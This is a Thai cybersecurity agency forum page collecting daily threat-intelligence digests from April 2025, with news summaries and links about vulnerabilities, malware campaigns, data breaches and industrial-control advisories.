สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
Global Moderators
Forum wide moderators
-
Kimsuky ใช้ช่องโหว่ BlueKeep เจาะระบบในเกาหลีใต้และญี่ปุ่น มุ่งเป้าอุตสาหกรรมซอฟต์แวร์ พลังงาน และการเงิน
-
เครือข่าย Scallywag ปลั๊กอิน WordPress สร้างทราฟฟิกโฆษณาหลอก 1.4 ล้านครั้งต่อวัน
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 23 April 2025
Industrial Sector
- Siemens TeleControl Server Basic SQL
"Successful exploitation of these vulnerabilities could allow an attacker to read and write to the application's database, cause a denial-of-service condition, and execute code in an OS shell."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-112-01 - Schneider Electric Wiser Home Controller WHC-5918A
"Successful exploitation of this vulnerability could allow an attacker to disclose sensitive credentials."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-112-03 - ABB MV Drives
"Successful exploitation of these vulnerabilities could allow an attacker to gain full access to the drive or cause a denial-of-service condition."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-112-04 - Siemens TeleControl Server Basic
"Successful exploitation of this vulnerability could allow an attacker to cause the application to allocate exhaustive amounts of memory and subsequently create a denial-of-service condition."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-112-02
Vulnerabilities
- Active! Mail RCE Flaw Exploited In Attacks On Japanese Orgs
"An Active! Mail zero-day remote code execution vulnerability is actively exploited in attacks on large organizations in Japan. Active! mail is a web-based email client developed initially by TransWARE and later acquired by Qualitia, both Japanese companies. While it's not widely used worldwide like Gmail or Outlook, Active! is often used as a groupware component in Japanese-language environments of large corporations, universities, government agencies, and banks."
https://www.bleepingcomputer.com/news/security/active-mail-rce-flaw-exploited-in-attacks-on-japanese-orgs/
https://jvn.jp/en/jp/JVN22348866/index.html - Bug Hunter Tricked SSL.com Into Issuing Cert For Alibaba Cloud Domain In 5 Steps
"Certificate issuer SSL.com’s domain validation system had an unfortunate bug that was exploited by miscreants to obtain, without authorization, digital certs for legit websites. With those certificates in hand, said fraudsters could set up more-convincing malicious copies of those sites for things like credential phishing, or decrypt intercepted HTTPS traffic between those sites and their visitors. And since learning of that flaw, SSL.com has revoked 11 wrongly issued certificates – one of them for Alibaba."
https://www.theregister.com/2025/04/22/ssl_com_validation_flaw/
https://www.securityweek.com/ssl-com-scrambles-to-patch-certificate-issuance-vulnerability/
https://hackread.com/ssl-com-vulnerability-fraud-ssl-certificates-domains/ - CVE-2025-3248: RCE Vulnerability In Langflow
"CVE-2025-3248, a critical remote code execution (RCE) vulnerability with a CVSS score of 9.8, has been discovered in Langflow, an open-source platform for visually composing AI-driven agents and workflows. The issue resides in the platform’s /api/v1/validate/code endpoint, which improperly invokes Python’s built-in exec() function on user-supplied code without authentication or sandboxing. This flaw allows attackers to exploit the API and execute arbitrary commands on the server, thus posing a significant risk to organizations using Langflow in their AI development workflows."
https://www.zscaler.com/blogs/security-research/cve-2025-3248-rce-vulnerability-langflow - ConfusedComposer: A Privilege Escalation Vulnerability Impacting GCP Composer
"Tenable Research discovered a privilege-escalation vulnerability in Google Cloud Platform (GCP) that is now fixed and which we dubbed ConfusedComposer. The vulnerability could have allowed an identity with permission (composer.environments.update) to edit a Cloud Composer environment to escalate privileges to the default Cloud Build service account. The default Cloud Build service account includes permissions to Cloud Build itself, as well as to Cloud Storage, Artifact Registry, and more."
https://www.tenable.com/blog/confusedcomposer-a-privilege-escalation-vulnerability-impacting-gcp-composer
https://thehackernews.com/2025/04/gcp-cloud-composer-bug-let-attackers.html
Malware
- Case Of Attacks Targeting MS-SQL Servers To Install Ammyy Admin
"AhnLab SEcurity intelligence Center (ASEC) recently identified cases of attacks installing Ammyy Admin on poorly managed MS-SQL servers. Ammyy Admin is a remote control tool used to control systems remotely along with AnyDesk, ToDesk, TeamViewer, etc."
https://asec.ahnlab.com/en/87606/ - Billbug: Intrusion Campaign Against Southeast Asia Continues
"The Billbug espionage group (aka Lotus Blossom, Lotus Panda, Bronze Elgin) compromised multiple organizations in a single Southeast Asian country during an intrusion campaign that ran between August 2024 and February 2025. Targets included a government ministry, an air traffic control organization, a telecoms operator, and a construction company. In addition to this, the group staged an intrusion against a news agency located in another country in Southeast Asia and an air freight organization located in another neighboring country."
https://www.security.com/threat-intelligence/billbug-china-espionage
https://thehackernews.com/2025/04/lotus-panda-hacks-se-asian-governments.html
https://therecord.media/billbug-china-linked-apt-southeast-asian-country-multiple-orgs-hacked
https://www.infosecurity-magazine.com/news/billbug-espionage-group-new-tools/ - SK Telecom Warns Customer USIM Data Exposed In Malware Attack
"South Korea's largest mobile operator, SK Telecom, is warning that a malware infection allowed threat actors to access sensitive USIM-related information for customers. SK Telecom is the largest mobile network operator in South Korea, holding approximately 48.4% of the mobile phone service market in the country, corresponding to 34 million subscribers. The company says they detected malware on their systems at 11 PM local time on Saturday, April 19, 2025, in a weekend cyberattack when most organizations are understaffed."
https://www.bleepingcomputer.com/news/security/sk-telecom-warns-customer-usim-data-exposed-in-malware-attack/
https://securityaffairs.com/176802/data-breach/sk-telecom-data-breach.html - Ripple's Recommended XRP Library Xrpl.js Hacked To Steal Wallets
"The recommended Ripple cryptocurrency NPM JavaScript library named "xrpl.js" was compromised to steal XRP wallet seeds and private keys and transfer them to an attacker-controlled server, allowing threat actors to steal all the funds stored in the wallets. Malicious code was added to versions 2.14.2, 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of the xrpl NPM package and published to the NPM registry yesterday between 4:46 PM and 5:49 PM ET. These compromised versions have since been removed, and a clean 4.2.5 release is now available that all users should upgrade to immediately."
https://www.bleepingcomputer.com/news/security/ripples-recommended-xrp-library-xrpljs-hacked-to-steal-wallets/ - Cookie-Bite: How Your Digital Crumbs Let Threat Actors Bypass MFA And Maintain Access To Cloud Environments
"Silent and undetectable initial access is the cornerstone of a successful cyberattack. MFA is designed to thwart such unauthorized access, but attackers are constantly evolving their techniques to bypass these defenses. Varonis Threat Labs researchers uncovered techniques that attackers are using to bypass MFA using stolen browser cookies. By leveraging custom-made malicious browser extensions and automation scripts, attackers can extract and reuse authentication cookies to impersonate users without needing credentials, while keeping persistence."
https://www.varonis.com/blog/cookie-bite
https://www.bleepingcomputer.com/news/security/cookie-bite-attack-poc-uses-chrome-extension-to-steal-session-tokens/
https://www.darkreading.com/remote-workforce/cookie-bite-entra-id-attack-exposes-microsoft-365 - Phishing For Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows
"Since early March 2025, Volexity has observed multiple suspected Russian threat actors conducting highly targeted social engineering operations aimed at gaining access to the Microsoft 365 (M365) accounts of targeted individuals. This activity comes on the heels of attacks Volexity reported on back in February 2025, where Russian threat actors were discovered targeting users and organizations through Device Code Authentication phishing."
https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/
https://therecord.media/russia-linked-phishing-microsoft365-ukraine-ngos - Infostealer Malware FormBook Spread Via Phishing Campaign – Part I
"Fortinet’s FortiGuard Labs observed a phishing campaign in the wild that delivered a malicious Word document as an attachment. This document contained crafted data designed to exploit the vulnerability CVE-2017-11882. After conducting an in-depth analysis, I discovered that the campaign was spreading a new variant of Formbook. Formbook is information-stealing malware targeting Windows users. It steals sensitive data from compromised systems, including stored credentials from popular software, the victim’s keystrokes, screenshots, and system clipboard data."
https://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign-part-i - Android Spyware Trojan Targets Russian Military Personnel Who Use Alpine Quest Mapping Software
"Doctor Web’s experts have discovered Android.Spy.1292.origin, spyware whose main target is Russian military personnel. The attackers hide this trojan inside modified Alpine Quest mapping software and distribute it in various ways, including through one of the Russian Android app catalogs. Among other things, the malware sends the attackers phonebook contact information and the infected device’s geolocation. Moreover, this spyware collects data about the files stored on the devices and, when commanded by threat actors, can download additional modules possessing the functionality needed to steal the files."
https://news.drweb.com/show/?i=15006&lng=en
https://hackread.com/fake-alpine-quest-mapping-app-spying-russian-military/ - Phishers Exploit Google Sites And DKIM Replay To Send Signed Emails, Steal Credentials
"In what has been described as an "extremely sophisticated phishing attack," threat actors have leveraged an uncommon approach that allowed bogus emails to be sent via Google's infrastructure and redirect message recipients to fraudulent sites that harvest their credentials. "The first thing to note is that this is a valid, signed email – it really was sent from no-reply@google.com," Nick Johnson, the lead developer of the Ethereum Name Service (ENS), said in a series of posts on X. "It passes the DKIM signature check, and Gmail displays it without any warnings – it even puts it in the same conversation as other, legitimate security alerts.""
https://thehackernews.com/2025/04/phishers-exploit-google-sites-and-dkim.html
https://www.malwarebytes.com/blog/news/2025/04/all-gmail-users-at-risk-by-clever-replay-attack
https://www.securityweek.com/legacy-google-service-abused-in-phishing-attacks/ - Russian Organizations Targeted By Backdoor Masquerading As Secure Networking Software Updates
"As we were looking into a cyberincident in April 2025, we uncovered a rather sophisticated backdoor. It targeted various large organizations in Russia, spanning the government, finance, and industrial sectors. While our investigation into the attack associated with the backdoor is still ongoing, we believe it is crucial to share our preliminary findings with the community. This will enable organizations that may be at risk of infection from the backdoor to take swift action to protect themselves from this threat."
https://securelist.com/new-backdoor-mimics-security-software-update/116246/ - Obfuscation Overdrive: Next-Gen Cryptojacking With Layers
"Out of all the services honeypotted by Darktrace, Docker is the most commonly attacked, with new strains of malware emerging daily. This blog will analyze a novel malware campaign with a unique obfuscation technique and a new cryptojacking technique."
https://www.darktrace.com/blog/obfuscation-overdrive-next-gen-cryptojacking-with-layers
https://thehackernews.com/2025/04/docker-malware-exploits-teneo-web3-node.html
https://www.infosecurity-magazine.com/news/cryptojacking-malware-docker-novel/
Breaches/Hacks/Leaks
- Marks & Spencer Confirms a Cyberattack As Customers Face Delayed Orders
"Marks & Spencer (M&S) has disclosed that it is responding to a cyberattack over the past few days that has impacted operations, including its Click and Collect service. The company is a British multinational retailer known for selling various products, including clothing, food, and home goods. Marks & Spencer operates over 1,400 stores and employs 64,000 employees globally. The company confirmed the cybersecurity incident in a press release on the London Stock Exchange, stating that they are working with cybersecurity experts to manage and resolve the situation."
https://www.bleepingcomputer.com/news/security/marks-and-spencer-confirms-a-cyberattack-as-customers-face-delayed-orders/
https://therecord.media/british-retailer-MS-confirms-cyber-incident-store-delays
https://www.theregister.com/2025/04/22/marks_spencer_cyber_incident/ - Two Healthcare Orgs Hit By Ransomware Confirm Data Breaches Impacting Over 100,000
"Two healthcare organizations have each confirmed suffering data breaches impacting more than 100,000 people after being targeted in ransomware attacks. One of them is Milwaukee, WI-based Bell Ambulance, which provides ambulance services in the area. The company revealed last week in a data security notice that it detected a network intrusion on February 13, 2025. An investigation showed that hackers gained access to files containing information such as name, date of birth, SSN, and driver’s license number, as well as financial, medical and health insurance information."
https://www.securityweek.com/two-healthcare-orgs-hit-by-ransomware-confirm-data-breaches-impacting-over-100000/
https://www.darkreading.com/cyberattacks-data-breaches/healthcare-orgs-hit-ransomeware-attacks - Thousands Of Baltimore Students, Teachers Affected By Data Breach Following February Ransomware Attack
"Thousands of students, teachers and administrators had information stolen from the Baltimore City Public Schools system during a ransomware attack in February. Officials at Baltimore City Public Schools published a breach notice on Tuesday warning that a cyber incident on February 13 exposed certain IT systems within the network. The statement said an investigation revealed that “certain documents may have been compromised by criminal actors, which contained information belonging to some current and former employees, volunteers, and contractors, as well as files related to less than 1.5% of our student population.”"
https://therecord.media/baltimore-public-schools-data-breach-ransomware
General News
- The Legal Blind Spot Of Shadow IT
"Shadow IT isn’t just a security risk, it’s a legal one. When teams use unsanctioned tools, they can trigger compliance violations, expose sensitive data, or break contracts. Let’s look at where the legal landmines are and what CISOs can do to stay ahead of them."
https://www.helpnetsecurity.com/2025/04/22/shadow-it-legal-blind-spot/ - The C-Suite Gap That’s Putting Your Company At Risk
"New research from EY US shows that cyber attacks are creating serious financial risks. C-suite leaders don’t always agree on how exposed their companies are or where the biggest threats come from. In EY US’s latest C-suite cybersecurity study, 84% of executives said their company had faced a cyber incident in the past three years. Another EY US review of Russell 3000 companies found that after a cyber attack, a company’s stock price drops by an average of 1.5% over the next 90 days. This shows how much these attacks can hurt a company’s value."
https://www.helpnetsecurity.com/2025/04/22/c-suite-gap-risk/ - What School IT Admins Are Up Against, And How To Help Them Win
"School IT admins are doing tough, important work under difficult conditions. From keeping Wi-Fi stable during exams to locking down systems from phishing emails, their job is part technician, part strategist, part firefighter. But they’re stretched thin. The tools are outdated, the support is missing, and the pressure never stops. Here’s a look at what they’re dealing with and how we can help."
https://www.helpnetsecurity.com/2025/04/22/what-school-it-admins-are-up-against/ - Compliance Weighs Heavily On Security And GRC Teams
"Only 29% of all organizations say their compliance programs consistently meet internal and external standards, according to Swimlane. Their report reveals that fragmented workflows, manual evidence gathering and poor collaboration between security and governance, risk and compliance (GRC) teams are leaving organizations vulnerable to audit failures, regulatory penalties and security gaps."
https://www.helpnetsecurity.com/2025/04/22/security-grc-teams-compliance/ - CVE Controversy Creates Opportunity To Improve
"An intense debate over how best to administer the tracking of common vulnerabilities and exposures (CVEs) is now underway following a last-minute decision by the Trump administration to continue funding this effort for the next 11 months. Today, CVEs are each given a unique name under a federally funded program administered by the MITRE Corporation. Any new vulnerability that is discovered can be reported to a CVE Numbering Authority (CNA) that helps administer the program. That data is then widely shared with cybersecurity vendors that use that information to alert customers and, if available, help remediate the root cause of the issue."
https://blog.barracuda.com/2025/04/21/cve-controversy-opportunity-improve - Russia Attempting Cyber Sabotage Attacks Against Dutch Critical Infrastructure
"Russian state-sponsored hackers have attempted to sabotage Dutch critical infrastructure in attacks this year and last, according to the Dutch Military Intelligence and Security Service’s annual public report, published Tuesday. Although the impact was said to be “minimal”, last year’s incident appeared to be “the first time that a group like this has carried out a cyber sabotage attack against such a control system in the Netherlands,” warned the service, known as the MIVD. The incidents were not detailed further in the MIVD’s public annual report, but mark an uptick in activity since 2023 when Hans de Vries — then the director of the country’s National Cyber Security Centre, and now the head at the EU’s cybersecurity agency — told Recorded Future News the Netherlands was not observing attacks directly targeting its own infrastructure."
https://therecord.media/dutch-mivd-report-russian-cyber-sabotage
https://www.bankinfosecurity.com/russian-chinese-hackers-targeted-dutch-government-a-28064 - The State Of Ransomware In The First Quarter Of 2025: Record-Breaking 126% Spike In Public Extortion Cases
"Ransomware remains one of the most persistent and damaging cyber threats facing organizations globally. The first quarter of 2025 marked an unprecedented surge in activity, with 74 distinct ransomware groups publicly claiming victims on data leak sites (DLS). These groups collectively reported 2,289 victims—more than double the number disclosed in the same period last year, which saw 1,011 published cases – a year-over-year increase of 126%."
https://blog.checkpoint.com/research/the-state-of-ransomware-in-the-first-quarter-of-2025-a-126-increase-in-ransomware-yoy/ - IBM X-Force 2025 Threat Intelligence Index
"This year, we’ve seen shape-shifting cyber adversaries gain more access, move across networks more easily, and create new outposts in relative obscurity. Equipped with advanced tools, threat actors are increasingly using compromised log-in credentials rather than brute-force hacking. The damage they inflict continues to grow as the global average cost of a data breach hit a record $4.88 million in 2024. What’s even more concerning is that data breaches are often only the start of larger and more coordinated campaigns. Threat actors openly trade exploits on the dark web to target critical infrastructure such as power grids, health networks, and industrial systems."
https://www.ibm.com/thought-leadership/institute-business-value/en-us/report/2025-threat-intelligence-index
https://cyberscoop.com/ibm-x-force-threat-intelligence-index-2025/ - DeepSeek Breach Opens Floodgates To Dark Web
"The recent DeepSeek security breach has once again highlighted the significant vulnerabilities in artificial intelligence (AI) systems and raises alarming questions about where the exposed data may have ended up. Shortly after DeepSeek's release, security researchers uncovered extensive vulnerabilities in the system's infrastructure. Publicly exposed sensitive user data and proprietary information like this often makes its way to the Dark Web — a thriving underground market where stolen data is routinely traded, sold, and exploited."
https://www.darkreading.com/cyberattacks-data-breaches/deepseek-breach-opens-floodgates-dark-web - 54% Of Tech Hiring Managers Expect Layoffs In 2025
"54% of tech hiring managers say their companies are likely to conduct layoffs within the next year, and 45% say employees whose roles can be replaced by AI are most likely to be let go, according to a new study by General Assembly. “We’re on the precipice of an unprecedented skills crisis,” said Daniele Grassi, CEO of General Assembly. “Businesses are ramping up AI investments and reducing headcount in the name of productivity, but they are creating a widening skills gap that will ultimately slow transformation. It’s time to get AI skills to every employee.”"
https://www.helpnetsecurity.com/2025/04/22/tech-layoffs-2025/ - Cybersecurity In 2025- Real-World Threats And Lessons Learned
"As cyber threats evolve, understanding their real-world impact is crucial. This article explores four significant cybersecurity threats shaping 2025—each illustrated by an actual incident that caused material losses—and the key lessons organisations can take from them."
https://www.darknet.org.uk/2025/04/cybersecurity-in-2025-real-world-threats-and-lessons-learned/
อ้างอิง
Electronic Transactions Development Agency(ETDA) - Siemens TeleControl Server Basic SQL
-
CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 5 รายการ
Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 5 รายการ เมื่อวันที่ 22 เมษายน 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้
- ICSA-25-112-01 Siemens TeleControl Server Basic SQL
- ICSA-25-112-02 Siemens TeleControl Server Basic
- ICSA-25-112-03 Schneider Electric Wiser Home Controller WHC-5918A
- ICSA-25-112-04 ABB MV Drives
- ICSA-25-035-04 Schneider Electric Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC (Update A)
ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2025/04/22/cisa-releases-five-industrial-control-systems-advisories
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
แฮกเกอร์โจมตี SonicWall SMA ตั้งแต่เดือนมกราคม 2025
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
กลุ่มแฮกเกอร์ Mustang Panda เพิ่มเครื่องมือสำหรับใช้โจมตีใหม่ 4 รายการ
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 22 April 2025
New Tooling
- Hawk Eye: Open-Source Scanner Uncovers Secrets And PII Across Platforms
"Hawk Eye is an open-source tool that helps find sensitive data before it leaks. It runs from the command line and checks many types of storage for PII and secrets: passwords, API keys, and personal information. “Unlike most open-source tools that only scan cloud buckets for PII, this solution is designed for deep integration across your entire ecosystem. It supports 350+ file types (including videos, images, and documents), uses advanced OCR, and ensures complete data privacy by running entirely on-prem. No data ever leaves your environment,” Rohit Kumar, the developer of Hawk Eye, told Help Net Security."
https://www.helpnetsecurity.com/2025/04/21/hawk-eye-open-source-scanner/
https://github.com/rohitcoder/hawk-eye
Malware
- Phishing Attacks Leveraging HTML Code Inside SVG Files
"With each passing year, phishing attacks feature more and more elaborate techniques designed to trick users and evade security measures. Attackers employ deceptive URL redirection tactics, such as appending malicious website addresses to seemingly safe links, embed links in PDFs, and send HTML attachments that either host the entire phishing site or use JavaScript to launch it. Lately, we have noticed a new trend where attackers are distributing attachments in SVG format, the kind normally used for storing images."
https://securelist.com/svg-phishing/116256/ - Proton66 Part 1: Mass Scanning And Exploit Campaigns
"In this two-part series, SpiderLabs explores the malicious traffic associated with Proton66, revealing the extent and nature of these attacks. The first part of the series focuses on mass scanning and exploit activities, highlighting a specific IP address connected to SuperBlack ransomware operators, found to distribute some of the latest critical priority exploits. The second part delves into a range of malware campaigns linked to Proton66, including compromised WordPress websites redirecting Android devices to fake Google Play stores, an XWorm campaign targeting Korean-speaking chat room users, and the WeaXor Ransomware."
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/proton66-part-1-mass-scanning-and-exploit-campaigns/
https://thehackernews.com/2025/04/hackers-abuse-russian-bulletproof-host.html - FOG Ransomware Spread By Cybercriminals Claiming Ties To DOGE
"During our monitoring of the ransomware threat landscape, we discovered samples with infection chain characteristics and payloads that can be attributed to FOG ransomware. A total of nine samples were uploaded to VirusTotal between March 27 and April 2, which we recently discovered were multiple ransomware binaries with .flocked extension and readme.txt notes. We observed that these samples initially dropped a note containing key names related to the Department of Government Efficiency (DOGE), an initiative of the current US administration that has been making headlines, recently about a member who allegedly assisted a cybercrime group involved in data theft and cyberstalking an agent of the Federal Bureau of Investigation (FBI). The note also contains instructions to spread the ransomware payload to other computers by pasting the provided code in the note. "
https://www.trendmicro.com/en_us/research/25/d/fog-ransomware-concealed-within-binary-loaders-linking-themselve.html
https://www.darkreading.com/cyberattacks-data-breaches/fog-hackers-doge-ransom-notes - Phishers Abuse Google OAuth To Spoof Google In DKIM Replay Attack
"In a rather clever attack, hackers leveraged a weakness that allowed them to send a fake email that seemed delivered from Google’s systems, passing all verifications but pointing to a fraudulent page that collected logins. The attacker leveraged Google’s infrastructure to trick recipients into accessing a legitimate-looking “support portal” that asks for Google account credentials. The fraudulent message appeared to come from “no-reply@google.com” and passed the DomainKeys Identified Mail (DKIM) authentication method but the real sender was different."
https://www.bleepingcomputer.com/news/security/phishers-abuse-google-oauth-to-spoof-google-in-dkim-replay-attack/
https://threadreaderapp.com/thread/1912439023982834120.html - New Rust Botnet "RustoBot" Is Routed Via Routers
"FortiGuard Labs recently discovered a new botnet propagating through TOTOLINK devices. Unlike previous malware targeting these devices, this variant is written in Rust—a programming language introduced by Mozilla in 2010. Due to its Rust-based implementation, we’ve named the malware “RustoBot.”"
https://www.fortinet.com/blog/threat-research/new-rust-botnet-rustobot-is-routed-via-routers - Booking.com Phishing Scam Uses Fake CAPTCHA To Install AsyncRAT
"Fake Booking.com emails trick hotel staff into running AsyncRAT malware via fake CAPTCHA, targeting systems with remote access trojan. A new phishing campaign is targeting hotel staff with fake Booking.com emails, tricking victims into executing malicious commands on their own systems. The scam appears well-planned, combining social engineering with the end aim to infect and compromise hotel networks with AsyncRAT."
https://hackread.com/booking-com-phishing-scam-fake-captcha-asyncrat/ - Lumma Stealer – Tracking Distribution Channels
"The evolution of Malware-as-a-Service (MaaS) has significantly lowered the barriers to entry for cybercriminals, with information stealers becoming one of the most commercially successful categories in this underground economy. Among these threats, Lumma Stealer has emerged as a particularly sophisticated player since its introduction in 2022 by the threat actor known as Lumma. Initially marketed as LummaC2, this information stealer quickly gained traction in underground forums, with prices starting at $250. As of March 2025, its presence on dark web marketplaces and Telegram channels continues to grow, with over a thousand active subscribers."
https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/ - Mitigating ELUSIVE COMET Zoom Remote Control Attacks
"When our CEO received an invitation to appear on “Bloomberg Crypto,” he immediately recognized the hallmarks of a sophisticated social engineering campaign. What appeared to be a legitimate media opportunity was, in fact, the latest operation by ELUSIVE COMET—a threat actor responsible for millions in cryptocurrency theft through carefully constructed social engineering attacks. This post details our encounter with ELUSIVE COMET, explains their attack methodology targeting the Zoom remote control feature, and provides concrete defensive measures organizations can implement to protect themselves."
https://blog.trailofbits.com/2025/04/17/mitigating-elusive-comet-zoom-remote-control-attacks/
https://www.securityweek.com/north-korean-cryptocurrency-thieves-caught-hijacking-zoom-remote-control-feature/ - Japan Warns Of Hundreds Of Millions Of Dollars In Unauthorized Trades From Hacked Accounts
"Japanese regulators published an urgent warning about hundreds of millions of dollars worth of unauthorized trades being conducted on hacked brokerage accounts in the country. Japan’s Financial Services Agency (FSA) said on Friday that there has been a “sharp increase in the number of cases of unauthorized access and unauthorized trading” through online trading services. The trend was occurring, according to the agency, because of stolen customer information obtained through phishing websites “disguised as websites of real securities companies.”"
https://therecord.media/japan-warns-of-unauthorized-trades-hacked-accounts - AgeoStealer: How Social Engineering Targets Gamers
"Infostealers have proven to be a gold mine for threat actors, responsible for stealing 75%—or 2.1 billion—of 2024’s 3.2 billion total credentials, fueling a constant cycle of account takeover attacks, ransomware, and high-profile data breaches. In our 2025 Global Threat Intelligence Report, we detailed their meteoric rise as a primary threat vector, with our analysts tracking over 24 unique stealer strains—such as RedLine, RisePro, and Lumma Stealer—being listed for sale on illicit marketplaces. Now, organizations will need to add AgeoStealer to their watch list as cybercriminals exploit the immense popularity of gaming."
https://flashpoint.io/blog/ageostealer-how-social-engineering-targets-gamers/ - False Face: Unit 42 Demonstrates The Alarming Ease Of Synthetic Identity Creation
"Evidence suggests that North Korean IT workers are using real-time deepfake technology to infiltrate organizations through remote work positions, which poses significant security, legal and compliance risks. The detection strategies we outline in this report provide security and HR teams with practical guidance to strengthen their hiring processes against this threat."
https://unit42.paloaltonetworks.com/north-korean-synthetic-identity-creation/ - Pirate Ships As a Service: Scallywag And Enabling Digital Piracy
"It’s hard to monetize digital piracy. Advertisers don’t want their brands associated with illicit activity, after all. As a result, threat actors have to get crafty with finding revenue sources to cash out and make the risks of sailing the high seas worth it for them. HUMAN’s Satori Threat Intelligence and Research team has disrupted Scallywag, a sophisticated ad fraud operation using a collection of WordPress extensions to monetize digital piracy with hundreds of cashout domains and URL shortening. Scallywag generates revenue for bad actors by inserting intermediary pages between a piracy catalog site and the actual streaming pirated content."
https://www.humansecurity.com/scallywag-open-redirectors/
https://www.humansecurity.com/learn/blog/satori-disruption-scallywag/
https://www.bleepingcomputer.com/news/security/scallywag-ad-fraud-operation-generated-14-billion-ad-requests-per-day/ - KeyPlug-Linked Server Briefly Exposes Fortinet Exploits, Webshells, And Recon Activity Targeting a Major Japanese Company
"A briefly exposed directory on infrastructure tied to KeyPlug malware revealed tooling likely used in active operations. The server, live for less than a day, exposed Fortinet firewall and VPN-targeting exploit scripts, a PHP-based webshell, and network reconnaissance scripts targeting authentication and internal portals associated with a major Japanese company. While short-lived, the exposure provides an unfettered view into a likely advanced adversary's operational staging and planning."
https://hunt.io/blog/keyplug-server-exposes-fortinet-exploits-webshells
Breaches/Hacks/Leaks
- Texas City Takes Systems Offline After Cyberattack
"The government of Abilene, Texas, has shut down some of its systems due to a cyberattack. City officials said they became aware of the incident on Friday when they received reports of unresponsive servers within the city’s internal network. IT staff immediately began disconnecting the affected systems and cybersecurity experts have been hired to investigate the issue. “Out of an abundance of caution, certain systems have been taken offline. However, emergency services are still up and running with the continued ability to timely assist, and no unidentified financial activity has been detected,” the city said on Monday."
https://therecord.media/texas-abilene-offline-cyberattack-systems
General News
- Cybercriminals Blend AI And Social Engineering To Bypass Detection
"Attackers are focusing more on stealing identities. Because of this, companies need to use zero trust principles. They should also verify user identities more carefully, says DirectDefense. Researchers analyzed thousands of alerts, mapping them to the MITRE ATT&CK framework, a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations."
https://www.helpnetsecurity.com/2025/04/21/adversaries-cybercrime-techniques/ - Cyber Threats Now a Daily Reality For One In Three Businesses
"Businesses are losing out on an average of $98.5 million a year as a consequence of cyber threats, fraud, regulatory hurdles and operational inefficiencies, according to research from FIS and Oxford Economics. The cost of disharmony is highest among technology companies, followed by insurance, financial services and fintech respondents."
https://www.helpnetsecurity.com/2025/04/21/businesses-fraud-consequence/ - Why CISOs Are Watching The GenAI Supply Chain Shift Closely
"In supply chain operations, GenAI is gaining traction. But according to Logility’s Supply Chain Horizons 2025 report, many security leaders remain uneasy about what that means for data protection, legacy tech, and trust in automation. The survey of 500 global supply chain leaders shows that 97% are already using some form of GenAI. But only a third are using tools designed specifically for supply chain tasks. And nearly half (43%) say they worry about how their data is used or shared when applying GenAI. Another 40% don’t trust the answers it gives."
https://www.helpnetsecurity.com/2025/04/21/ciso-genai-supply-chain/ - Microsoft Dominates As Top Target For Imitation, Mastercard Makes a Comeback
"Phishing attacks are one of the primary intrusion points for cyber criminals. As we examine the phishing threat landscape through the first quarter of 2025, cyber criminals continue to leverage trusted names to deceive unsuspecting users. Here’s a closer look at the trends, top brands targeted, and most notable incidents we’ve observed thus far in 2025."
https://blog.checkpoint.com/research/microsoft-dominates-as-top-target-for-imitation-mastercard-makes-a-comeback/ - Thinking Of Smishing Your Employees? Think Twice.
"With the pervasiveness of SMS-based phishing, often referred to as “smishing,” to target consumers’ personal devices, more organizations are considering deploying smishing simulations on employees’ mobile phones. These efforts stem from concerns over potential corporate breaches and compliance requirements. However, this approach is fraught with its own risks and can open organizations to legal liability and regulatory fines – not to mention the damage it can do to employee morale."
https://cofense.com/blog/thinking-of-smishing-your-employees-think-twice - The Sophos Annual Threat Report: Cybercrime On Main Street 2025
"Small businesses are a prime target for cybercrime, as we highlighted in our last annual report. Many of the criminal threats we covered in that report remained a major menace in 2024, including ransomware–which remains a primary existential cyber threat to small and midsized organizations. Ransomware cases accounted for 70 percent of Sophos Incident Response cases for small business customers in 2024—and over 90 percent for midsized organizations (from 500 to 5000 employees). Ransomware and data theft attempts accounted for nearly 30 percent of all Sophos Managed Detection and Response (MDR) tracked incidents (in which malicious activity of any sort was detected) for small and midsized businesses."
https://news.sophos.com/en-us/2025/04/16/the-sophos-annual-threat-report-cybercrime-on-main-street-2025/
https://www.darkreading.com/threat-intelligence/nation-state-threats-smb - Can Cybersecurity Weather The Current Economic Chaos?
"As the Trump administration continues to pursue a chaotic tariff policy — announcing steep tariffs on the United States' major trading partners, only to pause most of the import taxes for 90 days — economists are increasingly predicting a recession in the next 12 months, as business decision-makers pare back plans for the future amid increasing inflation and uncertainty."
https://www.darkreading.com/cloud-security/cybersecurity-weather-current-economic-chaos - The Global AI Race: Balancing Innovation And Security
